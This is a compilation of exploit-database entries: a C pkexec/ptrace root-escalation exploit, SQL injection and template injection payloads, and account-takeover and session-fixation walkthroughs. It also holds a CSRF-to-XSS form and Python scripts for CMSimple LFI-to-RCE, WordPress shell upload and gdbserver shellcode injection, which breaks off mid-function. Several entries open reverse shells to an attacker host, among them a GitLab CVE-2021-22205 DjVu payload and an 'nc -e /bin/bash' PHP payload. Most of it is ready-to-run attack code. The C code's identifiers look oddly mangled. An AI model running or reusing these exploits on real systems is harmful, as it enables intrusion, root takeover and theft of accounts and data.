<sys/user.h> #include <linux/elf.h> #include <stdarg.h> #include <pwd.h> #include <sys/prctl.h> #include <sys/wait.h> #include <sys/ptrace.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <signal.h> #define _GNU_SOURCE #define DEBUG #ifdef DEBUG #define dprintf printf #endif #define max(a,b) ((a)>(b) ? 
(a) : (b)) #define eff(expr) ({ \ typeof(expr) __res = (expr); \ if (__res == -1) { \ dprintf("[-] Error: %s\n", #expr); \ return 0; \ } \ __res; \ }) struct stat st; const char *trunk[1024]; const char *trunks_rec[] = { "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper", "/usr/sbin/mate-power-backlight-helper", "/usr/lib/gnome-settings-daemon/gsd-backlight-helper", "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper", "/usr/lib/unity-settings-daemon/usd-backlight-helper", "/usr/bin/xfpm-power-backlight-helper", "/usr/bin/lxqt-backlight_backend", "/usr/lib/gsd-backlight-helper", "/usr/lib/gsd-wacom-led-helper", "/usr/lib/gsd-wacom-oled-helper", "/usr/libexec/gsd-wacom-led-helper", "/usr/libexec/gsd-wacom-oled-helper", "/usr/libexec/gsd-backlight-helper", }; static int trace_align[2]; static const char *path_exec = "/usr/bin/pkexec"; static const char *path_action = "/usr/bin/pkaction"; static int fd = -1; static int pipe_stat; static const char *term_sh = "/bin/bash"; static int mid_succ = 1; static const char *path_doublealign; static char *tdisp(char *fmt, ...) 
{ static char overlayfs[10000]; va_list ap; va_start(ap, fmt); vsprintf(overlayfs, fmt, ap); va_end(ap); return overlayfs; } static int middle_main(void *overlayfs) { prctl(PR_SET_PDEATHSIG, SIGKILL); pid_t middle = getpid(); fd = eff(open("/proc/_fd/exe", O_RDONLY)); pid_t child = eff(fork()); if (child == 0) { prctl(PR_SET_PDEATHSIG, SIGKILL); eff(dup2(fd, 42)); int proc_fd = eff(open(tdisp("/proc/%d/status", middle), O_RDONLY)); char *threadv = tdisp("\nUid:\t%d\t0\t", getuid()); eff(ptrace(PTRACE_TRACEME, 0, NULL, NULL)); execl(path_exec, basename(path_exec), NULL); while (1) { char overlayfs[1000]; ssize_t buflen = eff(pread(proc_fd, overlayfs, sizeof(overlayfs)-1, 0)); overlayfs[buflen] = '\0'; if (strstr(overlayfs, threadv)) break; } dprintf("SUID execution failed."); exit(EXIT_FAILURE); } eff(dup2(fd, 0)); eff(dup2(trace_align[1], 1)); struct passwd *pw = getpwuid(getuid()); if (pw == NULL) { dprintf("err: username invalid/failed to fetch username"); exit(EXIT_FAILURE); } mid_succ = 1; execl(path_exec, basename(path_exec), "--user", pw->pw_name, path_doublealign, "--help", NULL); mid_succ = 0; dprintf("err: pkexec execution failed."); exit(EXIT_FAILURE); } static int timeexecbuffer(pid_t pid, int exec_fd, char *arg0) { struct user_regs_struct regs; struct exeio exev = { .iov_base = &regs, .iov_len = sizeof(regs) }; eff(ptrace(PTRACE_SYSCALL, pid, 0, NULL)); eff(waitpid(pid, &pipe_stat, 0)); eff(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &exev)); unsigned long inject_surface = (regs.rsp - 0x1000) & ~0xfffUL; struct injected_page { unsigned long inj_arse[2]; unsigned long environment[1]; char arg0[8]; char path[1]; } ipage = { .inj_arse = { inject_surface + offsetof(struct injected_page, arg0) } }; strcpy(ipage.arg0, arg0); for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) { unsigned long pro_d = ((unsigned long *)&ipage)[i]; eff(ptrace(PTRACE_POKETEXT, pid, inject_surface + i * sizeof(long), (void*)pro_d)); } eff(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, 
&exev)); eff(ptrace(PTRACE_DETACH, pid, 0, NULL)); eff(waitpid(pid, &pipe_stat, 0)); regs.orig_rax = __NR_execveat; regs.rdi = exec_fd; regs.rsi = inject_surface + offsetof(struct injected_page, path); regs.rdx = inject_surface + offsetof(struct injected_page, inj_arse); regs.r10 = inject_surface + offsetof(struct injected_page, environment); regs.r8 = AT_EMPTY_PATH; } static int stag_2(void) { pid_t child = eff(waitpid(-1, &pipe_stat, 0)); timeexecbuffer(child, 42, "stage3"); return 0; } static int sh_spawn(void) { eff(setresgid(0, 0, 0)); eff(setresuid(0, 0, 0)); execlp(term_sh, basename(term_sh), NULL); dprintf("err: Shell spawn unsuccessful.", term_sh); exit(EXIT_FAILURE); } static int check_env(void) { const char* xdg_session = getenv("XDG_SESSION_ID"); dprintf("accessing variables...\n"); if (stat(path_action, &st) != 0) { dprintf("err: pkaction not found at %s.", path_action); exit(EXIT_FAILURE); } if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) { dprintf("warn: PolKit agent not found.\n"); return 1; } if (stat("/usr/sbin/getsebool", &st) == 0) { if (system("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on") == 0) { dprintf("warn: [deny_ptrace] is enabled.\n"); return 1; } } if (xdg_session == NULL) { dprintf("warn: $XDG_SESSION_ID is not set.\n"); return 1; } if (stat(path_exec, &st) != 0) { dprintf("err: pkexec not found at %s.", path_exec); exit(EXIT_FAILURE); } dprintf("execution has reached EOP.\n"); return 0; } int trunkh() { char cmd[1024]; snprintf(cmd, sizeof(cmd), "%s --verbose", path_action); FILE *fp; fp = popen(cmd, "r"); if (fp == NULL) { dprintf("err: Failed to run %s.\n", cmd); exit(EXIT_FAILURE); } char line[1024]; char buffer[2048]; int helper_index = 0; int useful_action = 0; static const char *threadv = "org.freedesktop.policykit.exec.path -> "; int needle_length = strlen(threadv); while (fgets(line, sizeof(line)-1, fp) != NULL) { if (strstr(line, 
"implicit active:")) { if (strstr(line, "yes")) { useful_action = 1; } continue; } if (useful_action == 0) continue; useful_action = 0; int length = strlen(line); char* found = memmem(&line[0], length, threadv, needle_length); if (found == NULL) continue; memset(buffer, 0, sizeof(buffer)); for (int i = 0; found[needle_length + i] != '\n'; i++) { if (i >= sizeof(buffer)-1) continue; buffer[i] = found[needle_length + i]; } if (stat(&buffer[0], &st) != 0) continue; if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 || strstr(&buffer[0], "/cpugovctl") != 0 || strstr(&buffer[0], "/package-system-locked") != 0 || strstr(&buffer[0], "/cddistupgrader") != 0) { dprintf("blacklisted thread helper ignored: %s\n", &buffer[0]); continue; } trunk[helper_index] = strndup(&buffer[0], strlen(buffer)); helper_index++; if (helper_index >= sizeof(trunk)/sizeof(trunk[0])) break; } pclose(fp); return 0; } int root_ptraceme() { dprintf("helper initiated: %s\n", path_doublealign); eff(pipe2(trace_align, O_CLOEXEC|O_DIRECT)); eff(fcntl(trace_align[0], F_SETPIPE_SZ, 0x1000)); char overlayfs = 0; eff(write(trace_align[1], &overlayfs, 1)); dprintf("SUID process is being initiated(%s) ...\n", path_exec); static char stackv[1024*1024]; pid_t midpid = eff(clone(middle_main, stackv+sizeof(stackv), CLONE_VM|CLONE_VFORK|SIGCHLD, NULL)); if (!mid_succ) return 1; while (1) { int fd = open(tdisp("/proc/%d/comm", midpid), O_RDONLY); char overlayfs[16]; int buflen = eff(read(fd, overlayfs, sizeof(overlayfs)-1)); overlayfs[buflen] = '\0'; *strchrnul(overlayfs, '\n') = '\0'; if (strncmp(overlayfs, basename(path_doublealign), 15) == 0) break; usleep(100000); } dprintf("midpid is being traced...\n"); eff(ptrace(PTRACE_ATTACH, midpid, 0, NULL)); eff(waitpid(midpid, &pipe_stat, 0)); dprintf("midpid attached.\n"); timeexecbuffer(midpid, 0, "stage2"); exit(EXIT_SUCCESS); } int main(int argc, char **inj_arse) { if (strcmp(inj_arse[0], "stage2") == 0) return stag_2(); if (strcmp(inj_arse[0], 
"stage3") == 0) return sh_spawn(); dprintf("Welcome to your Arsenal!\n"); check_env(); if (argc > 1 && strcmp(inj_arse[1], "check") == 0) { exit(0); } dprintf("efficient trunk is being searched...\n"); trunkh(); for (int i=0; i<sizeof(trunk)/sizeof(trunk[0]); i++) { if (trunk[i] == NULL) break; if (stat(trunk[i], &st) == 0) { path_doublealign = trunk[i]; root_ptraceme(); } } dprintf("familiar trunks are been searched ...\n"); for (int i=0; i<sizeof(trunks_rec)/sizeof(trunks_rec[0]); i++) { if (stat(trunks_rec[i], &st) == 0) { path_doublealign = trunks_rec[i]; dprintf("trunk helper found: %s\n", path_doublealign); root_ptraceme(); } } return 0; }

Bus Pass Management System 1.0 - 'Search' SQL injection

# Exploit Title: Bus Pass Management System 1.0 - 'Search' SQL injection # Date: 23-11-2021 # Exploit Author: Abhijeet Singh # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql/ # Version: v-1.0 (Default) # Tested on: macOS Monterey (Version 12.0.1) *SQL Injection:* SQL injection is a web security vulnerability that allows an attacker to alter the SQL queries made to the database. This can be used to retrieve sensitive information such as the database structure, tables, columns, and their underlying data. *Attack Vector:* An attacker can compromise the database of the application using automated (or manual) tools such as sqlmap. *Steps to reproduce:* 1. Open the 'View Pass' page using the following URL: http://127.0.0.1/buspassms/download-pass.php 2. Put the payload below in the 'Search' field. *Payload:* 123' AND (SELECT 7169 FROM (SELECT(SLEEP(4)))abhi) AND 'x'='x 3. The server accepts the payload and the response is delayed by 4 seconds. The delay is the time-based blind indicator; to rule out ordinary latency, compare against the same request without SLEEP(). *IMPACT:* As the vulnerable parameter is an external parameter (credentials not required), an attacker can dump the database of the application remotely. Suggested Mitigation/Remediation Actions: Parameterized queries should be used to separate the command and data portions of the intended query to the database. These queries prevent an attacker from tampering with the query logic and extending a concatenated database query string. Code reviews should be conducted to identify any additional areas where the application or other applications in the organization are vulnerable to this attack. Additionally, input validation should be enforced on the server side in order to ensure that only expected data is sent in queries. Where possible, security-specific libraries should be used in order to provide an additional layer of protection.
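# Exploit Title: CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated)
# Date: 11/15/2021
# Exploit Author: S1lv3r
# Vendor Homepage: https://www.cmsimple.org/en/
# Software Link: https://www.cmsimple.org/en/
# Version: CMSimple 5.4
# Tested on: CMSimple 5.4
# writeup:
# https://github.com/iiSiLvEr/CMSimple5.4-Vulnerabilities
#!/usr/bin/python3
"""CMSimple 5.4 authenticated LFI -> RCE.

Flow, as implemented below:
  1. Login() authenticates, reads the CSRF token from the config editor and
     saves a config whose ``functions_file`` points (via ``../`` traversal)
     at the PHP session file for session id ``S1lv3r``.
  2. fuzz() threads flood the site with multipart uploads carrying a
     ``PHP_SESSION_UPLOAD_PROGRESS`` field and ``PHPSESSID=S1lv3r``, so
     PHP's session.upload_progress writes the attacker-controlled
     ``<?php ... ?>`` string into that session file, which CMSimple then
     includes as its functions file.

Module-level RHOST / LHOST / LPORT / User / Password are assigned by the
command-line block at the bottom and read by the functions.
"""
import sys
import threading
from urllib.parse import quote_plus

import requests
from bs4 import BeautifulSoup

# Uncomment the `proxies=proxies` arguments below to inspect traffic in Burp.
proxies = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080"}

# Session id used both as the PHPSESSID cookie and in the sess_<id> file name.
SESSION_NAME = "S1lv3r"

# The traversal only has to climb past the web root; surplus "../" at "/"
# are no-ops. /var/lib/php/sessions is the Debian/Ubuntu session.save_path —
# adjust for other distributions.
TRAVERSAL = "..%2F" * 32
SESSION_FILE = f"{TRAVERSAL}var%2Flib%2Fphp%2Fsessions%2Fsess_{SESSION_NAME}"


def Login() -> bool:
    """Authenticate and point CMSimple's functions_file at the session file.

    Returns True when the config-save request was sent, False on any error.
    The original swallowed every exception and started the upload threads
    regardless; callers should abort when this returns False.
    """
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    try:
        s = requests.Session()
        # Credentials are URL-encoded: a '&' or '%' in the password would
        # otherwise corrupt the form body.
        data = (
            "login=true&selected=Welcome_to_CMSimple_5"
            f"&User={quote_plus(User)}&passwd={quote_plus(Password)}&submit=Login"
        )
        response = s.post(RHOST, data=data, headers=headers, verify=False)  # , proxies=proxies
        if not response.cookies.get("passwd"):
            print("(-) Login failed: no passwd cookie returned")
            return False
        print("(+) Sucessfully Logged In With " + User + ":" + Password)
        cookies = response.cookies

        # The config editor page carries the csrf_token needed to save.
        params = (("file", "config"), ("action", "array"))
        response = s.get(RHOST, cookies=cookies, params=params, verify=False)
        soup = BeautifulSoup(response.text, "lxml")
        field = soup.find("input", attrs={"name": "csrf_token"})
        if field is None or not field.get("value"):
            print("(-) csrf_token input not found on the config page")
            return False
        CsrfValue = field["value"]
        print("(+) Get CSRF Token : [ " + CsrfValue + " ]")

        data = (
            f"csrf_token={CsrfValue}&functions_file={SESSION_FILE}"
            "&form=array&file=config&action=save"
        )
        s.post(RHOST, headers=headers, cookies=cookies, data=data, verify=False)
        print("(+) Changing Functions file Done ")
        print("(+) Check Your nc listner on " + LPORT)
        return True
    except Exception as error:
        print("Error, Exiting;( ")
        print(error)
        return False


def fuzz() -> None:
    """Upload in a loop so the PHP payload lands in sess_S1lv3r.

    Runs until the process exits or a request raises (the original called
    exit() here, which inside a thread only ends that thread).
    """
    cookies = {"PHPSESSID": SESSION_NAME}
    payload = '<?php passthru("nc ' + LHOST + ' ' + LPORT + ' -e /bin/bash");?>'
    files = {
        "PHP_SESSION_UPLOAD_PROGRESS": (None, payload),
        # A dummy file part: PHP only records upload progress for requests
        # that actually carry a file.
        "file": ("Anything", "S1lv3r" * 100, "application/octet-stream"),
    }
    while True:
        try:
            requests.post(RHOST, files=files, cookies=cookies, verify=False)  # , proxies=proxies
        except Exception as error:
            print(error)
            return


def main() -> None:
    """Log in, repoint functions_file, then start 20 upload threads."""
    print("\n(+) CMSimple LFI to RCE \n")
    if not Login():
        print("(-) Aborting: functions_file was not changed")
        sys.exit(1)
    threads = [threading.Thread(target=fuzz) for _ in range(20)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()  # the original wrote `thread.join` without the call


if __name__ == "__main__":
    if len(sys.argv) <= 5:
        print("\n(-) Usage: {} <RHOST> <LHOST> <LPORT> <USER> <PASS>".format(s​ys.argv[0]))
        print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 admin S3cret".format(sys.argv[0]))
        print("\n(=) SiLvEr \n")
        sys.exit()
    RHOST = sys.argv[1]
    LHOST = sys.argv[2]
    LPORT = sys.argv[3]
    User = sys.argv[4]
    Password = sys.argv[5]
    main()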

Bagisto 1.3.3 - Client-Side Template Injection

# Exploit Title: Bagisto 1.3.3 - Client-Side Template Injection # Date: 11-25-2021 # Exploit Author: Mohamed Abdellatif Jaber # Vendor Homepage: https://bagisto.com/en/ # Software Link: https://github.com/bagisto/bagisto # Version: v1.3.3 # Tested on: [windows | chrome | firefox ] Exploit: 1. Register an account and log in. 2. Go to your profile and edit the name and address fields. 3. Put this payload in them: {{constructor.constructor('alert(document.domain)')()}} 4. When an admin (or anyone else) views the order or your profile, the stored value is evaluated as a client-side template expression and arbitrary JavaScript runs in their browser. Ref: https://portswigger.net/kb/issues/00200308_client-side-template-injection

orangescrum 1.8.0 - Privilege escalation (Authenticated)

# Exploit Title: orangescrum 1.8.0 - Privilege escalation (Authenticated) # Date: 07/10/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Company: https://redteam.pl # Vendor Homepage: https://www.orangescrum.org/ # Software Link: https://www.orangescrum.org/ # Version: 1.8.0 # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### Privilege escalation # The attacker must be a member of a project shared with the account to be taken over. # The vulnerability allows: * Taking over any account that shares a project with the attacker. The dashboard embeds every project member's "uniq_id" in the page source, and the "USER_UNIQ" cookie that identifies the logged-in user is exactly that value, so knowing a victim's uniq_id is enough to act as them. ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example 1. Go to the dashboard 2. View the page source 3. Find "var PUSERS" in the source 4. Copy the victim's "uniq_id" 5. Set your "USER_UNIQ" cookie to the victim's value taken from the page source 6. After refreshing the page you are logged in to the victim's account

opencart 3.0.3.8 - Session Injection

# Exploit Title: opencart 3.0.3.8 - Session Injection # Date: 28/11/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Company: https://redteam.pl # Vendor Homepage: https://www.opencart.com/ # Software Link: https://www.opencart.com/ # Version: 3.0.3.8 # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### Session Fixation / Injection The session cookie "OCSESSID" is improperly processed: the server accepts any client-supplied value and issues it back in Set-Cookie instead of generating its own identifier. Because of that, an attacker who can plant a cookie in a victim's browser knows the victim's session identifier once they log in (session fixation), and arbitrary session identifiers can be injected. ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example Modify the "OCSESSID" cookie value: ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- GET /opencart-3.0.3.8/index.php?route=product/category&path=20_26 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Referer: http://127.0.0.1/opencart-3.0.3.8/ Cookie: language=en-gb; currency=USD; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USERSUB_TYPE=0; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=mydashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; TASK_TYPE_IN_DASHBOARD=10; CURRENT_FILTER=cases; DASHBOARD_ORDER=1_1%3A%3A1%2C2%2C3%2C5%2C6%2C8%2C9; CAKEPHP=ommpvclncs2t37j8tsep486ig5; OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv Upgrade-Insecure-Requests: 
1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 ----------------------------------------------------------------------------------------------------------------------- The server adopts the attacker-supplied value and reflects it in Set-Cookie (note that the cookie is also issued without HttpOnly, Secure or SameSite attributes): Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 28 Nov 2021 15:16:06 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: PHP/8.0.11 Set-Cookie: OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv; path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18944 [...]
# Exploit Title: Quick.CMS 6.7 - Cross Site request forgery (CSRF) to Cross-site Scripting (XSS) (Authenticated) # Date: 21/04/2021 # Exploit Author: Rahad Chowdhury # Vendor Homepage: https://opensolution.org/ # Software Link: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip # Version: 6.7 # Tested on: Windows 8.1, Kali Linux, Burp Suite Steps to Reproduce: 1. At first login to your panel 2. then click the "Sliders" menu to "New Slider" 3. now intercept with the burp suite and save a new slider 4. Then use XSS payload </textarea><script>alert(document.domain)</script> in sDescription value. 5. Now Generate a CSRF POC <!DOCTYPE html> <html> <body> <form action="http://127.0.0.1/admin.php?p=sliders-form" method="POST"> <input type="hidden" name="iSlider" value=""> <input type="hidden" name="aFile" filename=""> <input type="hidden" name="sFileNameOnServer" value="slider_2.jpg"> <input type="hidden" name="sDescription" value="test</textarea><script>alert(document.cookie)</script>"> <input type="hidden" name="iPosition" value="1"> <input type="hidden" name="sOption" value="save"> <input type="submit" value="submit"> </form> </body> </html>

GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)

# Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated) # Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22 # Date: 11/01/2021 # Exploit Author: Jacob Baines # Vendor Homepage: https://about.gitlab.com/ # Software Link: https://gitlab.com/gitlab-org/gitlab # Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8 # Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu) # CVE : CVE-2021-22205 # Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/ # Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed Code execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps. First generating the payload and then sending it. 1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270. 
echo -e "QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs=" | base64 -d > lol.jpg echo -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg echo -n "fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg==" | base64 -d >> lol.jpg 2. Sending the payload. Any random endpoint will do. curl -v -F 'file=@lol.jpg' http://10.0.0.7/$(openssl rand -hex 8) 2a. Sample Output from the reverse shell: $ nc -lnvp 1270 Listening on [0.0.0.0] (family 0, port 1270) Connection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport 34836) whoami git id uid=998(git) gid=998(git) groups=998(git)
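# Exploit Title: Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload
# Google Dork: inurl: /wp-content/plugins/smart-product-review/
# Date: 16/11/2021
# Exploit Author: Keyvan Hardani
# Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/
# Version: <= 1.0.4
# Tested on: Kali Linux
"""Upload a PHP file through the plugin's admin-ajax upload action.

The request carries its own ``allowedExtensions[]`` list including php4 and
phtml; the upload being "arbitrary" presumably means the server honours that
client-supplied list — confirm against the plugin source before relying on it.
"""
import sys
import time
from os import path

import requests


def banner():
    """Print a two-second spinner followed by the tool banner."""
    animation = "|/-\\"
    for i in range(20):
        time.sleep(0.1)
        sys.stdout.write("\r" + animation[i % len(animation)])
        sys.stdout.flush()
    print("Smart Product Review 1.0.4 - Arbitrary File Upload")
    print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)")


def usage():
    """Print command-line usage."""
    print("Usage: python3 exploit.py [target url] [your shell]")
    print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")


def vuln_check(uri):
    """Return False when *uri* answers with the plugin's "No script kiddies
    please!!" refusal, True otherwise.

    This is only a negative check: any other response — including a 404
    from a site without the plugin — counts as "vulnerable".
    """
    response = requests.get(uri)
    return "No script kiddies please!!" not in response.text


def main():
    """Parse argv, check the target, upload the file given on the CLI."""
    banner()
    if len(sys.argv) != 3:
        usage()
        sys.exit(1)
    base = sys.argv[1]
    file_path = sys.argv[2]
    ajax_action = 'sprw_file_upload_action'
    admin = '/wp-admin/admin-ajax.php'
    uri = base + admin + '?action=' + ajax_action
    if not vuln_check(uri):
        print("(*) Target not vulnerable!")
        sys.exit(1)
    if not path.isfile(file_path):
        print("(*) Invalid file!")
        sys.exit(1)
    data = {
        "allowedExtensions[0]": "jpg",
        "allowedExtensions[1]": "php4",
        "allowedExtensions[2]": "phtml",
        "allowedExtensions[3]": "png",
        "qqfile": "files",
        "element_id": "6837",
        "sizeLimit": "12000000",
        # NOTE(review): a WordPress nonce is normally per-site and time-limited;
        # this hard-coded value can only work if the action does not verify
        # it (or verifies it loosely) — confirm.
        "file_uploader_nonce": "2b102311b7",
    }
    print("Uploading Shell...")
    # Binary mode inside a context manager: the original opened the file in
    # text mode and never closed it.
    with open(file_path, 'rb') as fh:
        files = {'files[]': (path.basename(file_path), fh)}
        response = requests.post(uri, files=files, data=data)
    # Loose match; the plugin's reply format is not documented here.
    if "ok" in response.text:
        print("Shell Uploaded!")
        print("Shell URL on your Review/Comment")
    else:
        print("Shell Upload Failed")
        sys.exit(1)


# The original called main() unconditionally, so importing the module ran
# the exploit (and exited via usage()).
if __name__ == "__main__":
    main()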

GNU gdbserver 9.2 - Remote Command Execution (RCE)

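# Exploit Title: GNU gdbserver 9.2 - Remote Command Execution (RCE)
# Date: 2021-11-21
# Exploit Author: Roberto Gesteira Miñarro (7Rocky)
# Vendor Homepage: https://www.gnu.org/software/gdb/
# Software Link: https://www.gnu.org/software/gdb/download/
# Version: GNU gdbserver (Ubuntu 9.2-0ubuntu1~20.04) 9.2
# Tested on: Ubuntu Linux (gdbserver debugging x64 and x86 binaries)
#!/usr/bin/env python3
"""Write shellcode over the debuggee's current instruction pointer through
the GDB Remote Serial Protocol (RSP) and resume it.

Nothing here abuses a parser bug: a gdbserver reachable over the network
hands full control of the inferior (memory and register writes, resume) to
anyone who can connect. The mitigation is to bind gdbserver to localhost or
reach it only through an SSH tunnel.
"""
import binascii
import socket
import struct
import sys

help = f'''
Usage: python3 {sys.argv[0]} <gdbserver-ip:port> <path-to-shellcode>

Example:
  - Victim's gdbserver   -> 10.10.10.200:1337
  - Attacker's listener  -> 10.10.10.100:4444

1. Generate shellcode with msfvenom:
   $ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin
2. Listen with Netcat:
   $ nc -nlvp 4444
3. Run the exploit:
   $ python3 {sys.argv[0]} 10.10.10.200:1337 rev.bin
'''

# RSP register number of the PC as reported in the stop reply, mapped to
# (display name, word size, struct format): 0x10 is rip in the amd64
# register layout, 0x08 is eip in the i386 layout.
_ARCH_BY_PC_REG = {
    '10': ('x64', 8, '<Q'),
    '08': ('x86', 4, '<I'),
}


def checksum(s: str) -> str:
    """Return the RSP packet checksum of *s*: byte sum modulo 256 as exactly
    two lowercase hex digits.

    The original ``f'{res:2x}'`` space-padded sums below 0x10 (``' a'``); a
    space is not a hex digit, so such packets are malformed.
    """
    return f'{sum(map(ord, s)) % 256:02x}'


def rle_decode(s: str) -> str:
    """Expand RSP run-length encoding in *s*.

    ``x*n`` stands for ``x`` repeated ``ord(n) - 29`` additional times, so
    ``'0* '`` is four zeros. Text without ``*`` is returned unchanged. The
    original only cut the register value at a trailing ``0*`` run, which
    fails with ValueError when no run is present and mis-decodes runs that
    are not at the end.
    """
    out = []
    i = 0
    while i < len(s):
        if i + 2 < len(s) and s[i + 1] == '*':
            out.append(s[i] * (ord(s[i + 2]) - 29 + 1))
            i += 3
        else:
            out.append(s[i])
            i += 1
    return ''.join(out)


def ack(sock):
    """Acknowledge the last packet received from gdbserver."""
    sock.send(b'+')


def send(sock, s: str) -> str:
    """Send packet *s* framed as ``$s#cc``, read one reply and ack it.

    Returns the raw reply text including the leading ``+`` and framing. A
    single recv() suffices for the short replies used here; a long reply
    could be truncated — TODO confirm before reusing for large packets.
    """
    sock.send(f'${s}#{checksum(s)}'.encode())
    res = sock.recv(1024)
    ack(sock)
    return res.decode()


def exploit(sock, payload: str):
    """Single-step once to learn the PC, write *payload* there and continue.

    Args:
        sock: connected TCP socket to gdbserver.
        payload: shellcode as a hex string (``bytes.hex()``).

    Exits the process with status 1 on an unexpected stop reply or on a PC
    register number other than the amd64/i386 ones.
    """
    send(sock, 'qSupported:multiprocess+;qRelocInsn+;qvCont+;')
    send(sock, '!')  # extended mode
    try:
        # The stop reply looks like "+$T05thread:...;10:<pc hex>;...": the
        # third ';'-separated field is "<regno>:<value>".
        res = send(sock, 'vCont;s')
        data = res.split(';')[2]
        arch, pc = data.split(':')
    except Exception:
        print('[!] ERROR: Unexpected response. Try again later')
        sys.exit(1)

    if arch not in _ARCH_BY_PC_REG:
        # The original fell through with `addr` unbound (NameError).
        print(f'[!] ERROR: Unsupported architecture (PC register {arch!r})')
        sys.exit(1)
    name, word, fmt = _ARCH_BY_PC_REG[arch]
    print(f'[+] Found {name} arch')

    # The register value is little-endian bytes, possibly run-length
    # encoded; zero-pad in case the reply was still shorter than a word.
    pc_bytes = binascii.unhexlify(rle_decode(pc))[:word]
    pc_bytes += b'\0' * (word - len(pc_bytes))
    addr = f'{struct.unpack(fmt, pc_bytes)[0]:0{2 * word}x}'

    # 'M addr,length:XX...' takes the length in bytes; payload is hex text
    # with two characters per byte (the original sent twice the length).
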